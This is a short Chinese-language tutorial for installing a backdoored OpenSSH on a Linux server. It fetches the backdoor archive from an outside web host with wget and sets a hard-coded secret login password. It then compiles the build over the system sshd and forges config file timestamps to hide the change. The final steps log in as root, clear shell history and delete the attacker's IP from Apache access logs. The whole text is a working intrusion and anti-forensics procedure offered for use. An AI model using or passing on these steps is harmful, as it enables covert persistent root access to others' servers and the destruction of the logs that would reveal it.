备份原文件: 1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下
# wget http://www.test.com/test.tgz # tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" -> #test1234位后门连接密码 5、编译安装: # ./configure --prefix=/usr --sysconfdir=/etc/ssh # make && make install # cp ssh_config sshd_config /etc/ssh/ 修改文件时间: touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门: ssh -l root IP password:123456 echo >/root/.bash_history //清空操作日志 7、清除apache日志: export HISTFILE=/dev/null export HISTSIZE=0 cd /etc/httpd/logs/ sed -i '/IP/d' access_log*